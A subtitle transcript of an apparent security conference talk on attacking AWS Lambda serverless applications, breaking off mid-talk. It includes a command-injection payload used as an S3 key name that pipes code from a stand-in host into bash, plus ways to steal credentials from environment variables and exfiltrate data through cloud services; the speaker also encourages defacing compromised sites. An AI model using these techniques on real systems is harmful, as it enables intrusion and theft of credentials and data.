[Script Info]
Title: 
[Events]
Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text
Dialogue: 0,0:00:00.00,0:00:13.28,Default,,0000,0000,0000,,{\i1}preroll music{\i0}
Dialogue: 0,0:00:13.28,0:00:18.95,Default,,0000,0000,0000,,Herald: Like in the following talk I'm\Nhappy to introduce Rich Jones. Rich is
Dialogue: 0,0:00:18.95,0:00:25.01,Default,,0000,0000,0000,,gonna talk about what he can do in 60\Nmilliseconds with server-less servers.
Dialogue: 0,0:00:25.01,0:00:28.66,Default,,0000,0000,0000,,And please give a warm\Nround of applause for Rich!
Dialogue: 0,0:00:28.66,0:00:36.35,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:00:36.35,0:00:44.01,Default,,0000,0000,0000,,Rich: Hi everybody! Thank you very much\Nfor having me, for CCC for hosting, for
Dialogue: 0,0:00:44.01,0:00:48.94,Default,,0000,0000,0000,,you guys for coming out! I appreciate it.\NMy name is Rich Jones. I'm the founder and
Dialogue: 0,0:00:48.94,0:00:55.60,Default,,0000,0000,0000,,CTO of gun.io. We find awesome freelance\Ngigs for free and open source hackers. I'm
Dialogue: 0,0:00:55.60,0:01:02.54,Default,,0000,0000,0000,,also the author of ZAPPA. Which is the best \Ndamn server-less framework in the world.
Dialogue: 0,0:01:02.54,0:01:08.38,Default,,0000,0000,0000,,It can run any python web application on \NAWS lambda. You can build event driven
Dialogue: 0,0:01:08.38,0:01:16.14,Default,,0000,0000,0000,,applications you can connect roughly \N500.000 connections per second globally.
Dialogue: 0,0:01:16.14,0:01:22.17,Default,,0000,0000,0000,,Without any operations support right \Nout of the box for your existing apps.
Dialogue: 0,0:01:22.17,0:01:29.32,Default,,0000,0000,0000,,I first announced it about 6 months\Nago actually at Hack &amp; Tell event at
Dialogue: 0,0:01:29.32,0:01:34.63,Default,,0000,0000,0000,,C-Base and now it is like used in\Nproduction by all sorts of big companies
Dialogue: 0,0:01:34.63,0:01:41.02,Default,,0000,0000,0000,,which is pretty cool! You should try it out.\NWelcome to my talk, it is called Gone in
Dialogue: 0,0:01:41.02,0:01:46.70,Default,,0000,0000,0000,,60 Milliseconds! aka having a sexy title\Ngets your talk accepted at conferences.
Dialogue: 0,0:01:46.70,0:01:53.31,Default,,0000,0000,0000,,aka Intrusion and Exfiltration in\NServer-less Architectures. Whoooh. What the
Dialogue: 0,0:01:53.31,0:02:01.94,Default,,0000,0000,0000,,hell does that mean? Quick poll. Who here\Nis familiar with AWS Lambda? Okay, so
Dialogue: 0,0:02:01.94,0:02:08.13,Default,,0000,0000,0000,,about half, that's pretty good. That's\Nwhat I was expecting. Okay, great. For the
Dialogue: 0,0:02:08.13,0:02:14.65,Default,,0000,0000,0000,,unfamiliar, the good old days of servers.\NYou would have the web server it would
Dialogue: 0,0:02:14.65,0:02:19.07,Default,,0000,0000,0000,,connect to the database and that was\Npretty much it it would – you'd have the
Dialogue: 0,0:02:19.07,0:02:23.91,Default,,0000,0000,0000,,server. You'd have one server, you'ld\Nprobably run lots of services off that
Dialogue: 0,0:02:23.91,0:02:30.71,Default,,0000,0000,0000,,server so if you found a debug panel or\Nsomething like that, you could use one of
Dialogue: 0,0:02:30.71,0:02:35.53,Default,,0000,0000,0000,,your favorite tools, you could get a shell\Nand basically run a mock I know is the
Dialogue: 0,0:02:35.53,0:02:44.14,Default,,0000,0000,0000,,best. With the server-less architecture\Nthis one example it uses instead of a
Dialogue: 0,0:02:44.14,0:02:49.72,Default,,0000,0000,0000,,permanent web-server it uses this service\Ncalled AWS Lambda which provides no
Dialogue: 0,0:02:49.72,0:02:55.89,Default,,0000,0000,0000,,permanent infrastructure Your entire\Napplication function is held in cache by
Dialogue: 0,0:02:55.89,0:03:02.57,Default,,0000,0000,0000,,Amazon AWS and it's spawned and destroyed\Non a per-request basis. So in the space of
Dialogue: 0,0:03:02.57,0:03:07.78,Default,,0000,0000,0000,,a single web request or whatever function\Nrequest, it creates the container, returns
Dialogue: 0,0:03:07.78,0:03:13.11,Default,,0000,0000,0000,,and destroys the container. The code\Nexecution is triggered by a variety of
Dialogue: 0,0:03:13.11,0:03:19.44,Default,,0000,0000,0000,,cloud event sources every request is in an\Nisolated container. I'm gonna put an
Dialogue: 0,0:03:19.44,0:03:24.70,Default,,0000,0000,0000,,asterisk next to next to isolated as you\Nsee. The big advantage for the company is
Dialogue: 0,0:03:24.70,0:03:29.03,Default,,0000,0000,0000,,that it's super scalable. So, because one\Nrequest is one server it means that 10
Dialogue: 0,0:03:29.03,0:03:32.34,Default,,0000,0000,0000,,requests is 10 servers and so on and so on\Nand so on. So you can scale this all the
Dialogue: 0,0:03:32.34,0:03:37.37,Default,,0000,0000,0000,,way up to like trillions of events per\Nyear which is pretty cool. It's also much
Dialogue: 0,0:03:37.37,0:03:44.22,Default,,0000,0000,0000,,less expensive because you pay by the\Nmillisecond .000002 dollars per
Dialogue: 0,0:03:44.22,0:03:49.57,Default,,0000,0000,0000,,millisecond which interestingly is now the\Nsame in euros keep an eye on that,
Dialogue: 0,0:03:49.57,0:03:56.93,Default,,0000,0000,0000,,I was surprised by. Security patches to the\Noperating system are automatic because
Dialogue: 0,0:03:56.93,0:04:00.63,Default,,0000,0000,0000,,Amazon handles them so there is basically\Nyou don't worry about the operating system
Dialogue: 0,0:04:00.63,0:04:05.92,Default,,0000,0000,0000,,at all you only worry about your single\Nfunction which saves time, saves money,
Dialogue: 0,0:04:05.92,0:04:11.92,Default,,0000,0000,0000,,and lets you fire all people who work in\NOPS. Some common patterns that you see for
Dialogue: 0,0:04:11.92,0:04:16.80,Default,,0000,0000,0000,,companies and, you know, services are\Nusing lambda. One is just the web server
Dialogue: 0,0:04:16.80,0:04:22.95,Default,,0000,0000,0000,,this is like if you already use zappa for\Na django CMS or something like this. It's
Dialogue: 0,0:04:22.95,0:04:29.46,Default,,0000,0000,0000,,just API gateway, another AWS service to\Nlambda, which is the one we saw before
Dialogue: 0,0:04:29.46,0:04:32.83,Default,,0000,0000,0000,,Another common way that people are using\Nthis for asynchronous data processing.
Dialogue: 0,0:04:32.83,0:04:37.33,Default,,0000,0000,0000,,So if you have a file upload, that will then\Nexecute the lambda function which will
Dialogue: 0,0:04:37.33,0:04:44.61,Default,,0000,0000,0000,,store the result in a DynamoDB store and\Nthen have that trigger the upload to the
Dialogue: 0,0:04:44.61,0:04:53.91,Default,,0000,0000,0000,,S3 return bucket. So this is kind of like\Na very simple microservice type framework
Dialogue: 0,0:04:53.91,0:05:00.32,Default,,0000,0000,0000,,that you can use lambda for. Chat bots is\Nanother common use case So if you having a
Dialogue: 0,0:05:00.32,0:05:05.00,Default,,0000,0000,0000,,SMS Message or an e-mail exchange with a\Nrobot, it could be through lambda or one
Dialogue: 0,0:05:05.00,0:05:10.76,Default,,0000,0000,0000,,of those cool new like echo things. Maybe\Nwe will be able to like actually hack
Dialogue: 0,0:05:10.76,0:05:15.77,Default,,0000,0000,0000,,through those in the future using some of\Nthese techniques. So you can kind of see
Dialogue: 0,0:05:15.77,0:05:21.78,Default,,0000,0000,0000,,that there. And the big one that a lot of\Ncompanies are using like fintech and
Dialogue: 0,0:05:21.78,0:05:28.34,Default,,0000,0000,0000,,medical and science companies are using\Nfor is is kind of the driving engine for
Dialogue: 0,0:05:28.34,0:05:32.29,Default,,0000,0000,0000,,the state machine in big data processing.\NThis is kind of the interesting one that
Dialogue: 0,0:05:32.29,0:05:39.24,Default,,0000,0000,0000,,we get into a little bit more later in the\Ntalk So the lambda kind of drives the
Dialogue: 0,0:05:39.24,0:05:47.07,Default,,0000,0000,0000,,queue which is how the like big data\Nprocessing like compute cluster is knowing
Dialogue: 0,0:05:47.07,0:05:51.84,Default,,0000,0000,0000,,what to do. And there is loads more of\Nthese patterns but those are some of the
Dialogue: 0,0:05:51.84,0:05:57.06,Default,,0000,0000,0000,,ones that I've seen pretty commonly. So\Nwhen you try to attack these kind of
Dialogue: 0,0:05:57.06,0:06:01.65,Default,,0000,0000,0000,,applications it probably won't work. And\Neven if it does work, it will shut down
Dialogue: 0,0:06:01.65,0:06:07.63,Default,,0000,0000,0000,,immediately because they live in these\Nshort lived isolated container which is
Dialogue: 0,0:06:07.63,0:06:12.75,Default,,0000,0000,0000,,no fun. The container dies after the\Nfunction returns. Oh no! What does that
Dialogue: 0,0:06:12.75,0:06:16.62,Default,,0000,0000,0000,,mean for us? Us hackers. I mean it is\Nharder to infiltrate because there is less
Dialogue: 0,0:06:16.62,0:06:21.68,Default,,0000,0000,0000,,common code most of the stuff is custom so\Nfar. You can't use the same wordpress
Dialogue: 0,0:06:21.68,0:06:27.42,Default,,0000,0000,0000,,vulnerability over and over again. The\Nservices are isolated, the functions are
Dialogue: 0,0:06:27.42,0:06:33.68,Default,,0000,0000,0000,,isolated, there is no users to really\Nescalate on the system. There's no
Dialogue: 0,0:06:33.68,0:06:37.87,Default,,0000,0000,0000,,sysadmins to, you know, do your cool cron\Ntricks or whatever, for gaining
Dialogue: 0,0:06:37.87,0:06:44.94,Default,,0000,0000,0000,,escalation. It's also harder to persist\Nour malware because it immediately dies as
Dialogue: 0,0:06:44.94,0:06:49.91,Default,,0000,0000,0000,,soon as the container closes. It is also a\Nread-only filesystem, so we can't hide our
Dialogue: 0,0:06:49.91,0:06:56.23,Default,,0000,0000,0000,,files deep in the operating system And\Nit's only a sub-second lifecycle for the
Dialogue: 0,0:06:56.23,0:07:01.44,Default,,0000,0000,0000,,entire container anyway. There is no\Ninitialization system to infect because
Dialogue: 0,0:07:01.44,0:07:08.17,Default,,0000,0000,0000,,that is all taken care of by amazon and we\Ncan't get at it. It is also harder to
Dialogue: 0,0:07:08.17,0:07:12.78,Default,,0000,0000,0000,,exfiltrate, because there is a thing\Ncalled the virtual private cloud AWS
Dialogue: 0,0:07:12.78,0:07:18.26,Default,,0000,0000,0000,,provides. There's also function specific\Nroles which means a very strict
Dialogue: 0,0:07:18.26,0:07:24.69,Default,,0000,0000,0000,,permissioning system. A lot times we can't \Nget a reverse shell because there is no network
Dialogue: 0,0:07:24.69,0:07:30.40,Default,,0000,0000,0000,,access. So basically sad face. Oh no,\Nwe're totally boned!
Dialogue: 0,0:07:30.40,0:07:38.03,Default,,0000,0000,0000,,No we're not, hell not, dog. When Bezos \Ncloses a door, he opens a window.
Dialogue: 0,0:07:38.03,0:07:46.95,Default,,0000,0000,0000,,{\i1}laughter{\i0}\N{\i1}applause{\i0}
Dialogue: 0,0:07:46.95,0:07:53.26,Default,,0000,0000,0000,,So we gonna learn some recon, some\Ninfiltration, some exploitation, some
Dialogue: 0,0:07:53.26,0:08:01.09,Default,,0000,0000,0000,,exfiltration and a little bit of cleanup!\NPart 0: Recon aka How the hell do we know
Dialogue: 0,0:08:01.09,0:08:06.39,Default,,0000,0000,0000,,what we're attacking? There's gonna be two\Nattack surfaces. An outer and inner attack
Dialogue: 0,0:08:06.39,0:08:14.43,Default,,0000,0000,0000,,surface for a lambda function. The outer\Nattack surfaces are the API Gateway so if
Dialogue: 0,0:08:14.43,0:08:20.57,Default,,0000,0000,0000,,you look at the headers and you see that\Nit's serving dynamic content from
Dialogue: 0,0:08:20.57,0:08:26.34,Default,,0000,0000,0000,,CloudFront, that might an indication that\Nyou're dealing with API Gateway.
Dialogue: 0,0:08:26.34,0:08:30.43,Default,,0000,0000,0000,,File uploads is pretty easy if you look at\Nwhatever the upload endpoint is and you
Dialogue: 0,0:08:30.43,0:08:35.18,Default,,0000,0000,0000,,look at headers that says it is S3 that\Nprobably means that it's S3. If you look at
Dialogue: 0,0:08:35.18,0:08:38.62,Default,,0000,0000,0000,,the email headers that you you're\Ncommunication to the function with you can
Dialogue: 0,0:08:38.62,0:08:44.55,Default,,0000,0000,0000,,see that it is Amazon SES so that is\Npretty obvious. There is also the inner
Dialogue: 0,0:08:44.55,0:08:49.06,Default,,0000,0000,0000,,attack surface. So these are services that\Nwe can't access directly, but provide
Dialogue: 0,0:08:49.06,0:08:54.63,Default,,0000,0000,0000,,event sources for the function, so this\Ncan mean a whole bunch of stuff, so queues
Dialogue: 0,0:08:54.63,0:08:59.25,Default,,0000,0000,0000,,if there are a lot of long running tasks\Nand it's on AWS, it is possible that they
Dialogue: 0,0:08:59.25,0:09:05.48,Default,,0000,0000,0000,,are using the SQS queing system. But it\Ncan also mean database events, streams of
Dialogue: 0,0:09:05.48,0:09:10.48,Default,,0000,0000,0000,,information, user events, so logins and\Nuser creations and stuff like that can
Dialogue: 0,0:09:10.48,0:09:17.71,Default,,0000,0000,0000,,also be an event source. And the log\Nsystem itself can provide an event source.
Dialogue: 0,0:09:17.71,0:09:25.98,Default,,0000,0000,0000,,Part 1 infiltration aka how the hell are\Nwe gonna weaponize all that? So lambda
Dialogue: 0,0:09:25.98,0:09:30.99,Default,,0000,0000,0000,,functions essentially what the application\Nis, is kind of like a blue ball machine here.
Dialogue: 0,0:09:30.99,0:09:37.77,Default,,0000,0000,0000,,What we call Rube Goldberg machines.\NI just learned, for the translators, that
Dialogue: 0,0:09:37.77,0:09:43.20,Default,,0000,0000,0000,,you guys call these nonsense machines.\NEssentially lots of little functions and a
Dialogue: 0,0:09:43.20,0:09:48.08,Default,,0000,0000,0000,,lot of passing information between them.\NSo to figure out what's going on, we're
Dialogue: 0,0:09:48.08,0:09:54.56,Default,,0000,0000,0000,,going to use a process of destructive\Nmechanics aka dropping a bolt into the
Dialogue: 0,0:09:54.56,0:09:58.33,Default,,0000,0000,0000,,engine and then listening to the sound\Nthat it makes to try to figure out what is
Dialogue: 0,0:09:58.33,0:10:06.13,Default,,0000,0000,0000,,going on inside. The TL;DR of that is we\Ngonna attack the event sources themselves,
Dialogue: 0,0:10:06.13,0:10:10.85,Default,,0000,0000,0000,,we're going to fire off every type of\Ncloud event service that we can and
Dialogue: 0,0:10:10.85,0:10:18.01,Default,,0000,0000,0000,,basically see what shakes out. The usual\Nsuspects for infection, unsanitized input,
Dialogue: 0,0:10:18.01,0:10:25.09,Default,,0000,0000,0000,,deserialization bugs of all, you know all\Nvarieties, server side script injection,
Dialogue: 0,0:10:25.09,0:10:30.28,Default,,0000,0000,0000,,malicious binary files, and if it is a web\Nserver, most of your favorite web
Dialogue: 0,0:10:30.28,0:10:35.66,Default,,0000,0000,0000,,application type exploits. So just as a\Nvery trivial example of the kind of things
Dialogue: 0,0:10:35.66,0:10:43.63,Default,,0000,0000,0000,,that you might see here, So here is some\Ntrivially vulnerable code it's connecting
Dialogue: 0,0:10:43.63,0:10:51.60,Default,,0000,0000,0000,,to an S3 bucket, it's going over the items\Nand it's calling some process on the keys
Dialogue: 0,0:10:51.60,0:10:59.31,Default,,0000,0000,0000,,that are in the bucket. But what happens\Nif we create an object called: "; curl -s
Dialogue: 0,0:10:59.31,0:11:04.94,Default,,0000,0000,0000,,exploit.server.xyz | bash" well than\Nthat's gonna expand because it is just
Dialogue: 0,0:11:04.94,0:11:13.20,Default,,0000,0000,0000,,using the key name to call, you know, our\Nexploit code on the lambda function.
Dialogue: 0,0:11:13.20,0:11:22.16,Default,,0000,0000,0000,,Hurray! we did it! Part 2 exploitation aka\Nhow can we escalate our infection? aka
Dialogue: 0,0:11:22.16,0:11:28.81,Default,,0000,0000,0000,,what the hell is a lambda? aka what's\Nworth stealing? So if we actually find,
Dialogue: 0,0:11:28.81,0:11:31.97,Default,,0000,0000,0000,,you know, if we just look at the operating\Nsystem of a lambda, now that we're able to
Dialogue: 0,0:11:31.97,0:11:36.73,Default,,0000,0000,0000,,execute commands on it. Well that won't\Nwork as we don't have a shell, everything
Dialogue: 0,0:11:36.73,0:11:46.15,Default,,0000,0000,0000,,on lambda had this event context pattern\Nin it, whatever but if we do the find and
Dialogue: 0,0:11:46.15,0:11:52.68,Default,,0000,0000,0000,,we look at it, it pretty much looks like\Nstandard redhat 6 installation it's got
Dialogue: 0,0:11:52.68,0:11:57.76,Default,,0000,0000,0000,,python 2.7, interestingly it has python\N3.4 on it, it's got node, it's got perl,
Dialogue: 0,0:11:57.76,0:12:04.14,Default,,0000,0000,0000,,it's got gcc, it's got all you know, stuff\Nthat we like. Which is pretty good. If we
Dialogue: 0,0:12:04.14,0:12:08.39,Default,,0000,0000,0000,,look at the system even further, we'll see\Nthat it's running an operating system
Dialogue: 0,0:12:08.39,0:12:14.89,Default,,0000,0000,0000,,called Amazon Linux, which is the default\Nfor EC2, so maybe it's an EC2 server.
Dialogue: 0,0:12:14.89,0:12:20.87,Default,,0000,0000,0000,,If it's an EC2 server, can we access the\Nmetainfo server? That's a good idea! For
Dialogue: 0,0:12:20.87,0:12:25.52,Default,,0000,0000,0000,,For those who don't know about the meta-\Ndata server, from Amazon docs: Instance
Dialogue: 0,0:12:25.52,0:12:29.33,Default,,0000,0000,0000,,metadata is data about your instance that\Nyou can use to configure or manage the
Dialogue: 0,0:12:29.33,0:12:33.45,Default,,0000,0000,0000,,running instance, anyone who can access\Nthe instance can view its metadata.
Dialogue: 0,0:12:33.45,0:12:38.22,Default,,0000,0000,0000,,Therefore, you should take suitable\Nprecautions to protect sensitive data aka
Dialogue: 0,0:12:38.22,0:12:41.62,Default,,0000,0000,0000,,don't get hacked, because people can look\Nat this stuff. We can figure out all this
Dialogue: 0,0:12:41.62,0:12:46.33,Default,,0000,0000,0000,,information including keys and users and\Nsecurity groups so, you know, really good,
Dialogue: 0,0:12:46.33,0:12:53.28,Default,,0000,0000,0000,,good intel. What happens if we try to\Naccess the server? It doesn't work, so,
Dialogue: 0,0:12:53.28,0:12:57.17,Default,,0000,0000,0000,,sorry. But that's a good trick to remember\Nif you are attacking EC2, that you can get
Dialogue: 0,0:12:57.17,0:13:01.90,Default,,0000,0000,0000,,a lot of information out of the metainfo\Nserver. Now you're thinking, well let's take a
Dialogue: 0,0:13:01.90,0:13:06.04,Default,,0000,0000,0000,,look at the environment, let's look around\Nwhat's in the environment variables.
Dialogue: 0,0:13:06.04,0:13:10.36,Default,,0000,0000,0000,,Quite a lot actually including some inter-\Nesting stuff like session tokens, security
Dialogue: 0,0:13:10.36,0:13:17.08,Default,,0000,0000,0000,,tokens, access key IDs and secret access \Nkeys. So that's pretty cool. What are
Dialogue: 0,0:13:17.08,0:13:25.26,Default,,0000,0000,0000,,those? Enter IAM, so this is Amazons\Nidentity and access management system
Dialogue: 0,0:13:25.26,0:13:32.67,Default,,0000,0000,0000,,which provides per resource authentication\Nand authorisation definition. So basically
Dialogue: 0,0:13:32.67,0:13:39.37,Default,,0000,0000,0000,,1 task is gonna have 1, you know, set of\Nauthorisation to perform its functions.
Dialogue: 0,0:13:39.37,0:13:46.47,Default,,0000,0000,0000,,It sounds bad, it is. Like it makes our \Njob a lot harder. The good news is that
Dialogue: 0,0:13:46.47,0:13:51.26,Default,,0000,0000,0000,,it's super easy to fuck up! Pretty much\Neverybody who's using IAM has probably
Dialogue: 0,0:13:51.26,0:13:56.29,Default,,0000,0000,0000,,fucked up. Especially if you read the\Ndocumentations which Amazon provides which
Dialogue: 0,0:13:56.29,0:14:02.93,Default,,0000,0000,0000,,is terrible, or even badder if they got\Ntheir information from the AWS forum where
Dialogue: 0,0:14:02.93,0:14:09.17,Default,,0000,0000,0000,,you can find like real gems of wisdom\Nabout give everybody access to everything,
Dialogue: 0,0:14:09.17,0:14:13.64,Default,,0000,0000,0000,,which is nice. So full disclosure,\Neverything all the fun stuff that we're
Dialogue: 0,0:14:13.64,0:14:20.00,Default,,0000,0000,0000,,gonna do, does depend on them having\Nsome misconfigured IAM even subtly
Dialogue: 0,0:14:20.00,0:14:26.78,Default,,0000,0000,0000,,misconfigured IAM which isn't as cool, I\Nhave to admit but it's pretty common, so I
Dialogue: 0,0:14:26.78,0:14:32.61,Default,,0000,0000,0000,,don't think it's unreasonable to have\Nthat, be part of our attack criteria.
Dialogue: 0,0:14:32.61,0:14:38.60,Default,,0000,0000,0000,,So what the keys that we saw, were part of\Nthe lambda execution policy which uses
Dialogue: 0,0:14:38.60,0:14:43.67,Default,,0000,0000,0000,,this permission called iam:PassRole\Nbasically you take a predefined policy for
Dialogue: 0,0:14:43.67,0:14:48.12,Default,,0000,0000,0000,,what a function is allowed to do. It\Ncreates a temporary user with those
Dialogue: 0,0:14:48.12,0:14:52.93,Default,,0000,0000,0000,,permissions and gives the credentials for\Nthat user into the userspace in those
Dialogue: 0,0:14:52.93,0:14:59.82,Default,,0000,0000,0000,,environment variables that we saw. So this\Nis one of the ones that Amazon recommends,
Dialogue: 0,0:14:59.82,0:15:07.59,Default,,0000,0000,0000,,this is the AWS VPCAccessExecutionRole\Nthis is from Amazons documentation and
Dialogue: 0,0:15:07.59,0:15:13.88,Default,,0000,0000,0000,,this actually provides some interesting\Nthings that we're gonna be able to use.
Dialogue: 0,0:15:13.88,0:15:19.20,Default,,0000,0000,0000,,Resource:* is a great one because that\Nmeans we have access to everything
Dialogue: 0,0:15:19.20,0:15:23.36,Default,,0000,0000,0000,,available to the account We will need to\Ncreate log groups and streams, which is
Dialogue: 0,0:15:23.36,0:15:27.32,Default,,0000,0000,0000,,kind of interesting. Describing the\Nnetwork interface is also super
Dialogue: 0,0:15:27.32,0:15:31.67,Default,,0000,0000,0000,,interesting for us. And this will come in\Nhandy later. Okay, so we can describe the
Dialogue: 0,0:15:31.67,0:15:37.00,Default,,0000,0000,0000,,network What about actually like infecting\Nthe application source? Like we wanna add
Dialogue: 0,0:15:37.00,0:15:40.30,Default,,0000,0000,0000,,a backdoor. But first, where does the code\Nlive? So we check the environment
Dialogue: 0,0:15:40.30,0:15:48.91,Default,,0000,0000,0000,,variables again we see this key value for\NLAMBDA_TASK_ROOT which is good so we will
Dialogue: 0,0:15:48.91,0:15:54.45,Default,,0000,0000,0000,,just cat our backdoor into the application\NNo that is not gonna work. Sad face,
Dialogue: 0,0:15:54.45,0:15:59.60,Default,,0000,0000,0000,,because it's a read-only filesystem. \NAnd even if you could, write to that, you
Dialogue: 0,0:15:59.60,0:16:05.36,Default,,0000,0000,0000,,know, write to the filesystem, it's not\Ngonna persist for other users who, to call
Dialogue: 0,0:16:05.36,0:16:09.37,Default,,0000,0000,0000,,the function because it's not cached in\Nmemory so it would only live for the span
Dialogue: 0,0:16:09.37,0:16:14.62,Default,,0000,0000,0000,,of a single HTTP request which we don't\Ncare about. But, I got all of these cool,
Dialogue: 0,0:16:14.62,0:16:20.81,Default,,0000,0000,0000,,like hacker tools I wanna install on the\Nsystem how do I do that? Fortunately there
Dialogue: 0,0:16:20.81,0:16:25.25,Default,,0000,0000,0000,,is /tmp space on the disk because some,\Nyou know, normal applications are gonna
Dialogue: 0,0:16:25.25,0:16:31.65,Default,,0000,0000,0000,,need to read and write files and stuff so\N/tmp is totally readable and it works as
Dialogue: 0,0:16:31.65,0:16:39.99,Default,,0000,0000,0000,,we'd expected to. Amazon describes this as\Nephemeral disk capacity. But ephemeral
Dialogue: 0,0:16:39.99,0:16:46.56,Default,,0000,0000,0000,,isn't quite true actually, because this is\Nhow lambda executions are not completely
Dialogue: 0,0:16:46.56,0:16:54.07,Default,,0000,0000,0000,,isolated. For performance reasons they're\Nactually cached in Amazons memory across
Dialogue: 0,0:16:54.07,0:17:00.92,Default,,0000,0000,0000,,different executions. So because /tmp is a\Nram disk, and because ram is cached that
Dialogue: 0,0:17:00.92,0:17:07.73,Default,,0000,0000,0000,,means that /tmp is cached as well, so if\Nwe can store our tools across multiple
Dialogue: 0,0:17:07.73,0:17:14.30,Default,,0000,0000,0000,,executions. Yay! But the caveat for that is\Nthat we have to keep the function warm in
Dialogue: 0,0:17:14.30,0:17:20.78,Default,,0000,0000,0000,,memory by calling it every so often That\Nlength of time is 4 minutes, 30 seconds
Dialogue: 0,0:17:20.78,0:17:25.33,Default,,0000,0000,0000,,Somebody violated an NDA to tell you that,\Ndon't ask me
Dialogue: 0,0:17:25.33,0:17:28.01,Default,,0000,0000,0000,,{\i1}laughing{\i0}
Dialogue: 0,0:17:28.01,0:17:33.06,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:17:33.06,0:17:36.63,Default,,0000,0000,0000,,What's cool is this actually can also\Napply to long running processes aswell.
Dialogue: 0,0:17:36.63,0:17:43.13,Default,,0000,0000,0000,,It won't keep the function open, but it\Nwill, kind of, pause the process and then
Dialogue: 0,0:17:43.13,0:17:51.55,Default,,0000,0000,0000,,reopen it on the next execution. So now we\Ncan install, if we have linux x86_64
Dialogue: 0,0:17:51.55,0:17:56.98,Default,,0000,0000,0000,,compiled versions of all our favorite\Ntools we could put them on to the lambda
Dialogue: 0,0:17:56.98,0:18:02.32,Default,,0000,0000,0000,,function and start calling it. Okay, so\Nnow we got some keys, we got some tools,
Dialogue: 0,0:18:02.32,0:18:07.55,Default,,0000,0000,0000,,what can we do? So the first thing that we\Nprobably wanna do, is just see what we're
Dialogue: 0,0:18:07.55,0:18:14.94,Default,,0000,0000,0000,,allowed to do. Using the AWS CLI tool we\Ncan call this code and we will get back a
Dialogue: 0,0:18:14.94,0:18:21.82,Default,,0000,0000,0000,,policy, and if we're lucky, it 'll be {\b1}\N{\b0}** and then we can do whatever we want.
Dialogue: 0,0:18:21.82,0:18:28.89,Default,,0000,0000,0000,,Jackpot! We can create a new admin user\Nand pillage all the databases basically,
Dialogue: 0,0:18:28.89,0:18:36.76,Default,,0000,0000,0000,,it's game over! Yeah right! Maybe it'll\Nhappen probably yeah right. A very brief
Dialogue: 0,0:18:36.76,0:18:42.66,Default,,0000,0000,0000,,interlude. If you do get the jackpot, if\Nyou are looking at Facebook's AWS usage and
Dialogue: 0,0:18:42.66,0:18:49.38,Default,,0000,0000,0000,,you get *****. Don't sell the user info to\Nspammers. Don't claim a bug bounty. Don't
Dialogue: 0,0:18:49.38,0:18:55.79,Default,,0000,0000,0000,,just like use their creditcard to mine\Nbitcoin. Don't tell, you know, your
Dialogue: 0,0:18:55.79,0:19:02.37,Default,,0000,0000,0000,,favorite TLA. Don't even send all the\Ninformation to Julian, he's busy. Bug
Dialogue: 0,0:19:02.37,0:19:07.26,Default,,0000,0000,0000,,bounties are boring. Espionage is boring.\NI'm tired of all this like spy vs spy stuff.
Dialogue: 0,0:19:07.26,0:19:12.69,Default,,0000,0000,0000,,Use your skills of infection for awesome.\NPut up a bad-ass hacking crew name, you know.
Dialogue: 0,0:19:12.69,0:19:15.55,Default,,0000,0000,0000,,{\i1}laughing{\i0}
Dialogue: 0,0:19:15.55,0:19:19.57,Default,,0000,0000,0000,,Put spooky skulls, put a bunch of\Nspooky skulls on facebook.
Dialogue: 0,0:19:19.57,0:19:25.37,Default,,0000,0000,0000,,Put your IRC homies, know what's up\N{\i1}applause{\i0}
Dialogue: 0,0:19:25.37,0:19:32.22,Default,,0000,0000,0000,,I'm pretty serious about this, actually.\NLike I think the word losing some like
Dialogue: 0,0:19:32.22,0:19:37.07,Default,,0000,0000,0000,,aesthetic quality to our culture in\Npursuit of like money and like you know,
Dialogue: 0,0:19:37.07,0:19:43.95,Default,,0000,0000,0000,,careers and stuff like that. But I think\Nthe aesthetic value actually has like more
Dialogue: 0,0:19:43.95,0:19:49.31,Default,,0000,0000,0000,,worth and that over time is like, the\Nbroader community begins to respect like
Dialogue: 0,0:19:49.31,0:19:54.76,Default,,0000,0000,0000,,our aesthetic contributions, like the\Nthose hacks will actually be worth more in
Dialogue: 0,0:19:54.76,0:20:02.51,Default,,0000,0000,0000,,the long run than any bug bounty that you\N'll get now. So like keep it real, anyway,
Dialogue: 0,0:20:02.51,0:20:03.62,Default,,0000,0000,0000,,that was my side.
Dialogue: 0,0:20:03.62,0:20:09.01,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:20:09.01,0:20:17.08,Default,,0000,0000,0000,,So far more likely than {\i1}.{\i0}, you gonna get\Nsome kind of like strict permission, like
Dialogue: 0,0:20:17.08,0:20:23.18,Default,,0000,0000,0000,,the ability to access S3 objects, or the\Nthe ability to access the database, or
Dialogue: 0,0:20:23.18,0:20:29.88,Default,,0000,0000,0000,,some combination thereof using various,\Ndifferent cloud services available. How
Dialogue: 0,0:20:29.88,0:20:34.15,Default,,0000,0000,0000,,can we use that for nefarious purposes you\Nwondering. That's a great question. Part 3:
Dialogue: 0,0:20:34.15,0:20:41.81,Default,,0000,0000,0000,,Exfiltration aka take the money and run\Naka the fun part. TL;DR when you don't have
Dialogue: 0,0:20:41.81,0:20:46.61,Default,,0000,0000,0000,,a direct network connection, to the things\Nthat you wanna access, because you using a
Dialogue: 0,0:20:46.61,0:20:52.11,Default,,0000,0000,0000,,cloud provider, you can use tags, meta\Ninformation, and the cloud services
Dialogue: 0,0:20:52.11,0:20:58.58,Default,,0000,0000,0000,,themselves to shuttle information out of\Nthe cloud. So easy mode for instance, if we
Dialogue: 0,0:20:58.58,0:21:04.68,Default,,0000,0000,0000,,see that we have SES permissions, send,\Nuse the email, send, you know, we have a
Dialogue: 0,0:21:04.68,0:21:08.03,Default,,0000,0000,0000,,single function that will let us send an\Nemail out because it's a cloud provider
Dialogue: 0,0:21:08.03,0:21:14.08,Default,,0000,0000,0000,,that has an e-mail service. Or send a SMS,\Nyou know, you could actually, you can hack
Dialogue: 0,0:21:14.08,0:21:21.08,Default,,0000,0000,0000,,something and get the results back to your\Nvirtual cellphone. Slightly harder, if you
Dialogue: 0,0:21:21.08,0:21:27.63,Default,,0000,0000,0000,,just have S3 objects, you could, you know,\Nzip up the source of the application, put
Dialogue: 0,0:21:27.63,0:21:37.47,Default,,0000,0000,0000,,it on S3 and get it out that way. The fun\Nthing is VPC exfiltration. So this is the
Dialogue: 0,0:21:37.47,0:21:40.32,Default,,0000,0000,0000,,architecture that we were talking about\Nbefore It's a simple vibration but this is
